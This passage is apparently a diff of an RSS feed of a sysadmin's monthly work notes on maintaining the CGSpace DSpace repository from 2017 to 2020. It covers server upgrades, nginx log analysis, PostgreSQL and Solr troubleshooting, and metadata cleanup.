CTA is having problems submitting an item to CGSpace +<ul> +<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li> +<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li> +</ul> +</li> +</ul> + + + + April, 2020 + https://alanorth.github.io/cgspace-notes/2020-04/ + Thu, 02 Apr 2020 10:53:24 +0300 + + https://alanorth.github.io/cgspace-notes/2020-04/ + <h2 id="2020-04-02">2020-04-02</h2> +<ul> +<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +<ul> +<li>I updated the fifty-eight existing items on CGSpace</li> +</ul> +</li> +<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts: +<ul> +<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li> +<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li> +<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li> +</ul> +</li> +<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li> +</ul> + + + + March, 2020 + https://alanorth.github.io/cgspace-notes/2020-03/ + Mon, 02 Mar 2020 12:31:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-03/ + <h2 id="2020-03-02">2020-03-02</h2> +<ul> +<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs +<ul> +<li>Tag version 1.2.0 on GitHub</li> +</ul> +</li> +<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a> +<ul> +<li>You need to download this into the DSpace 6.x source and compile it</li> +</ul> +</li> +</ul> + + + + February, 2020 + https://alanorth.github.io/cgspace-notes/2020-02/ + Sun, 02 Feb 2020 11:56:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-02/ + <h2 id="2020-02-02">2020-02-02</h2> +<ul> +<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday +<ul> +<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li> +<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li> +<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li> +<li>The code finally builds and runs with a fresh install</li> +</ul> +</li> +</ul> + + + + January, 2020 + https://alanorth.github.io/cgspace-notes/2020-01/ + 
Mon, 06 Jan 2020 10:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2020-01/ + <h2 id="2020-01-06">2020-01-06</h2> +<ul> +<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li> +<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI +<ul> +<li>The score is now linked to the DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li> +<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li> +</ul> +</li> +</ul> +<h2 id="2020-01-07">2020-01-07</h2> +<ul> +<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has +<ul> +<li>The DOI has a score of 259, but the Handle has no score at all</li> +<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li> +</ul> +</li> +</ul> + + + + December, 2019 + https://alanorth.github.io/cgspace-notes/2019-12/ + Sun, 01 Dec 2019 11:22:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-12/ + <h2 id="2019-12-01">2019-12-01</h2> +<ul> +<li>Upgrade CGSpace (linode18) to Ubuntu 18.04: +<ul> +<li>Check any packages that have residual configs and purge them:</li> +<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li> +<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade +# apt-get autoremove &amp;&amp; apt-get autoclean +# dpkg -C +# reboot +</code></pre> + + + + November, 2019 + https://alanorth.github.io/cgspace-notes/2019-11/ + Mon, 04 Nov 2019 12:20:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-11/ + <h2 id="2019-11-04">2019-11-04</h2> +<ul> +<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +<ul> +<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +4671942 +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; +1277694 +</code></pre><ul> +<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> +<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; +1183456 +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; +106781 +</code></pre> + + + + October, 2019 + https://alanorth.github.io/cgspace-notes/2019-10/ + Tue, 01 Oct 2019 13:20:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-10/ + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit 
the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. + + + + September, 2019 + https://alanorth.github.io/cgspace-notes/2019-09/ + Sun, 01 Sep 2019 10:17:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-09/ + <h2 id="2019-09-01">2019-09-01</h2> +<ul> +<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> +<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 440 17.58.101.255 + 441 157.55.39.101 + 485 207.46.13.43 + 728 169.60.128.125 + 730 207.46.13.108 + 758 157.55.39.9 + 808 66.160.140.179 + 814 207.46.13.212 + 2472 163.172.71.23 + 6092 3.94.211.189 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 33 2a01:7e00::f03c:91ff:fe16:fcb + 57 3.83.192.124 + 57 3.87.77.25 + 57 54.82.1.8 + 822 2a01:9cc0:47:1:1a:4:0:2 + 1223 45.5.184.72 + 1633 172.104.229.92 + 5112 205.186.128.185 + 7249 2a01:7e00::f03c:91ff:fe18:7396 + 9124 45.5.186.2 +</code></pre> + + + + August, 2019 + https://alanorth.github.io/cgspace-notes/2019-08/ + Sat, 03 Aug 2019 12:39:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-08/ + <h2 id="2019-08-03">2019-08-03</h2> +<ul> +<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li> +</ul> +<h2 id="2019-08-04">2019-08-04</h2> +<ul> +<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it +<ul> +<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li> +<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li> +</ul> +</li> +<li>Run system updates on DSpace Test (linode19) and reboot it</li> +</ul> + + + + July, 2019 + https://alanorth.github.io/cgspace-notes/2019-07/ + Mon, 01 Jul 2019 12:13:51 +0300 + + https://alanorth.github.io/cgspace-notes/2019-07/ + <h2 id="2019-07-01">2019-07-01</h2> +<ul> +<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li> +<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: +<ul> +<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li> +<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li> +</ul> +</li> +<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li> +</ul> + + + + June, 2019 + https://alanorth.github.io/cgspace-notes/2019-06/ + Sun, 02 Jun 2019 10:57:51 +0300 + + 
https://alanorth.github.io/cgspace-notes/2019-06/ + <h2 id="2019-06-02">2019-06-02</h2> +<ul> +<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li> +<li>Run system updates on CGSpace (linode18) and reboot it</li> +</ul> +<h2 id="2019-06-03">2019-06-03</h2> +<ul> +<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li> +</ul> + + + + May, 2019 + https://alanorth.github.io/cgspace-notes/2019-05/ + Wed, 01 May 2019 07:37:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-05/ + <h2 id="2019-05-01">2019-05-01</h2> +<ul> +<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li> +<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +<ul> +<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li> +<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li> +</ul> +</li> +<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li> +</ul> +<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648; +DELETE 1 +</code></pre><ul> +<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li> +</ul> + + + + April, 2019 + https://alanorth.github.io/cgspace-notes/2019-04/ + Mon, 01 Apr 2019 09:00:43 +0300 + + https://alanorth.github.io/cgspace-notes/2019-04/ + <h2 id="2019-04-01">2019-04-01</h2> +<ul> +<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +<ul> +<li>They asked if we had plans to enable RDF support in CGSpace</li> +</ul> +</li> +<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +<ul> +<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li> +</ul> +</li> +</ul> +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 + 4432 200 +</code></pre><ul> +<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> +<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d +</code></pre> + + + + March, 2019 + https://alanorth.github.io/cgspace-notes/2019-03/ + Fri, 01 Mar 2019 12:16:30 +0100 + + https://alanorth.github.io/cgspace-notes/2019-03/ + <h2 id="2019-03-01">2019-03-01</h2> 
+<ul> +<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li> +<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li> +<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11 +<ul> +<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li> +<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li> +<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li> +<li>68.15% � 9.45 instead of 68.15% ± 9.45</li> +<li>2003�2013 instead of 2003–2013</li> +</ul> +</li> +<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li> +</ul> + + + + February, 2019 + https://alanorth.github.io/cgspace-notes/2019-02/ + Fri, 01 Feb 2019 21:37:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-02/ + <h2 id="2019-02-01">2019-02-01</h2> +<ul> +<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> +<li>The top IPs before, during, and after this latest alert tonight were:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 245 207.46.13.5 + 332 54.70.40.11 + 385 5.143.231.38 + 405 207.46.13.173 + 405 207.46.13.75 + 1117 66.249.66.219 + 1121 35.237.175.180 + 1546 5.9.6.51 + 2474 45.5.186.2 + 5490 85.25.237.71 +</code></pre><ul> +<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li> +<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> +<li>There were just over 3 million accesses in the nginx logs last month:</li> +</ul> +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; +3018243 + +real 0m19.873s +user 0m22.203s +sys 0m1.979s +</code></pre> + + + + January, 2019 + https://alanorth.github.io/cgspace-notes/2019-01/ + Wed, 02 Jan 2019 09:48:30 +0200 + + https://alanorth.github.io/cgspace-notes/2019-01/ + <h2 id="2019-01-02">2019-01-02</h2> +<ul> +<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> +<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> +</ul> +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 + 92 40.77.167.4 + 99 210.7.29.100 + 120 38.126.157.45 + 177 35.237.175.180 + 177 40.77.167.32 + 216 66.249.75.219 + 225 18.203.76.93 + 261 46.101.86.248 + 357 207.46.13.1 + 903 54.70.40.11 +</code></pre> + + + + December, 2018 + https://alanorth.github.io/cgspace-notes/2018-12/ + Sun, 02 Dec 2018 02:09:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-12/ + <h2 
id="2018-12-01">2018-12-01</h2> +<ul> +<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li> +<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li> +<li>Then I ran all system updates and restarted the server</li> +</ul> +<h2 id="2018-12-02">2018-12-02</h2> +<ul> +<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li> +</ul> + + + + November, 2018 + https://alanorth.github.io/cgspace-notes/2018-11/ + Thu, 01 Nov 2018 16:41:30 +0200 + + https://alanorth.github.io/cgspace-notes/2018-11/ + <h2 id="2018-11-01">2018-11-01</h2> +<ul> +<li>Finalize AReS Phase I and Phase II ToRs</li> +<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li> +</ul> +<h2 id="2018-11-03">2018-11-03</h2> +<ul> +<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li> +<li>Today these are the top 10 IPs:</li> +</ul> + + + + October, 2018 + https://alanorth.github.io/cgspace-notes/2018-10/ + Mon, 01 Oct 2018 22:31:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-10/ + <h2 id="2018-10-01">2018-10-01</h2> +<ul> +<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li> +<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li> +</ul> + + + + September, 2018 + https://alanorth.github.io/cgspace-notes/2018-09/ + Sun, 02 Sep 2018 09:55:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-09/ + <h2 id="2018-09-02">2018-09-02</h2> +<ul> +<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li> +<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li> +<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li> +<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li> +</ul> + + + + August, 2018 + https://alanorth.github.io/cgspace-notes/2018-08/ + Wed, 01 Aug 2018 11:52:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-08/ + <h2 id="2018-08-01">2018-08-01</h2> +<ul> +<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li> +</ul> +<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child +[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB +[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB +</code></pre><ul> +<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li> +<li>From the DSpace log I see that eventually Solr stopped responding, so I 
guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li> +<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li> +<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li> +<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li> +<li>I ran all system updates on DSpace Test and rebooted it</li> +</ul> + + + + July, 2018 + https://alanorth.github.io/cgspace-notes/2018-07/ + Sun, 01 Jul 2018 12:56:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-07/ + <h2 id="2018-07-01">2018-07-01</h2> +<ul> +<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li> +</ul> +<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace +</code></pre><ul> +<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li> +</ul> +<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue. +</code></pre> + + + + June, 2018 + https://alanorth.github.io/cgspace-notes/2018-06/ + Mon, 04 Jun 2018 19:49:54 -0700 + + https://alanorth.github.io/cgspace-notes/2018-06/ + <h2 id="2018-06-04">2018-06-04</h2> +<ul> +<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>) +<ul> +<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li> +</ul> +</li> +<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li> +<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li> +</ul> +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n +</code></pre><ul> +<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/">March, 2018</a></li> +<li>Time to index ~70,000 items on CGSpace:</li> +</ul> +<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b + +real 74m42.646s +user 8m5.056s +sys 2m7.289s +</code></pre> + + + + May, 2018 + https://alanorth.github.io/cgspace-notes/2018-05/ + Tue, 01 May 2018 16:43:54 +0300 + + https://alanorth.github.io/cgspace-notes/2018-05/ + <h2 id="2018-05-01">2018-05-01</h2> +<ul> +<li>I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface: +<ul> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E</li> +<li>http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E</li> +</ul> +</li> +<li>Then I reduced the JVM heap size from 6144 back to 5120m</li> +<li>Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the <a 
href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to support hosts choosing which distribution they want to use</li> +</ul> + + + + April, 2018 + https://alanorth.github.io/cgspace-notes/2018-04/ + Sun, 01 Apr 2018 16:13:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-04/ + <h2 id="2018-04-01">2018-04-01</h2> +<ul> +<li>I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when</li> +<li>Catalina logs at least show some memory errors yesterday:</li> +</ul> + + + + March, 2018 + https://alanorth.github.io/cgspace-notes/2018-03/ + Fri, 02 Mar 2018 16:07:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-03/ + <h2 id="2018-03-02">2018-03-02</h2> +<ul> +<li>Export a CSV of the IITA community metadata for Martin Mueller</li> +</ul> + + + + February, 2018 + https://alanorth.github.io/cgspace-notes/2018-02/ + Thu, 01 Feb 2018 16:28:54 +0200 + + https://alanorth.github.io/cgspace-notes/2018-02/ + <h2 id="2018-02-01">2018-02-01</h2> +<ul> +<li>Peter gave feedback on the <code>dc.rights</code> proof of concept that I had sent him last week</li> +<li>We don&rsquo;t need to distinguish between internal and external works, so that makes it just a simple list</li> +<li>Yesterday I figured out how to monitor DSpace sessions using JMX</li> +<li>I copied the logic in the <code>jmx_tomcat_dbpools</code> provided by Ubuntu&rsquo;s <code>munin-plugins-java</code> package and used the stuff I discovered about JMX <a href="https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-01/">in 2018-01</a></li> +</ul> + + + + January, 2018 + https://alanorth.github.io/cgspace-notes/2018-01/ + Tue, 02 Jan 2018 08:35:54 -0800 + + https://alanorth.github.io/cgspace-notes/2018-01/ + <h2 id="2018-01-02">2018-01-02</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time</li> +<li>I didn&rsquo;t get any load alerts from Linode and the REST and XMLUI logs don&rsquo;t show anything out of the ordinary</li> +<li>The nginx logs show HTTP 200s until <code>02/Jan/2018:11:27:17 +0000</code> when Uptime Robot got an HTTP 500</li> +<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li> +<li>And just before that I see this:</li> +</ul> +<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000]. +</code></pre><ul> +<li>Ah hah! So the pool was actually empty!</li> +<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li> +<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li> +<li>I notice this error quite a few times in dspace.log:</li> +</ul> +<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32. 
+</code></pre><ul> +<li>And there are many of these errors every day for the past month:</li> +</ul> +<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.* +dspace.log.2017-11-21:4 +dspace.log.2017-11-22:1 +dspace.log.2017-11-23:4 +dspace.log.2017-11-24:11 +dspace.log.2017-11-25:0 +dspace.log.2017-11-26:1 +dspace.log.2017-11-27:7 +dspace.log.2017-11-28:21 +dspace.log.2017-11-29:31 +dspace.log.2017-11-30:15 +dspace.log.2017-12-01:15 +dspace.log.2017-12-02:20 +dspace.log.2017-12-03:38 +dspace.log.2017-12-04:65 +dspace.log.2017-12-05:43 +dspace.log.2017-12-06:72 +dspace.log.2017-12-07:27 +dspace.log.2017-12-08:15 +dspace.log.2017-12-09:29 +dspace.log.2017-12-10:35 +dspace.log.2017-12-11:20 +dspace.log.2017-12-12:44 +dspace.log.2017-12-13:36 +dspace.log.2017-12-14:59 +dspace.log.2017-12-15:104 +dspace.log.2017-12-16:53 +dspace.log.2017-12-17:66 +dspace.log.2017-12-18:83 +dspace.log.2017-12-19:101 +dspace.log.2017-12-20:74 +dspace.log.2017-12-21:55 +dspace.log.2017-12-22:66 +dspace.log.2017-12-23:50 +dspace.log.2017-12-24:85 +dspace.log.2017-12-25:62 +dspace.log.2017-12-26:49 +dspace.log.2017-12-27:30 +dspace.log.2017-12-28:54 +dspace.log.2017-12-29:68 +dspace.log.2017-12-30:89 +dspace.log.2017-12-31:53 +dspace.log.2018-01-01:45 +dspace.log.2018-01-02:34 +</code></pre><ul> +<li>Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains</li> +</ul> + + + + December, 2017 + https://alanorth.github.io/cgspace-notes/2017-12/ + Fri, 01 Dec 2017 13:53:54 +0300 + + https://alanorth.github.io/cgspace-notes/2017-12/ + <h2 id="2017-12-01">2017-12-01</h2> +<ul> +<li>Uptime Robot noticed that CGSpace went down</li> +<li>The logs say &ldquo;Timeout waiting for idle object&rdquo;</li> +<li>PostgreSQL activity says there are 115 connections currently</li> +<li>The list of connections to XMLUI and REST API for today:</li> +</ul> + + + + November, 2017 + https://alanorth.github.io/cgspace-notes/2017-11/ + Thu, 02 Nov 2017 09:37:54 +0200 + + https://alanorth.github.io/cgspace-notes/2017-11/ + <h2 id="2017-11-01">2017-11-01</h2> +<ul> +<li>The CORE developers responded to say they are looking into their bot not respecting our robots.txt</li> +</ul> +<h2 id="2017-11-02">2017-11-02</h2> +<ul> +<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li> +</ul> +<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log +0 +</code></pre><ul> +<li>Generate list of authors on CGSpace for Peter to go through and correct:</li> +</ul> +<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = 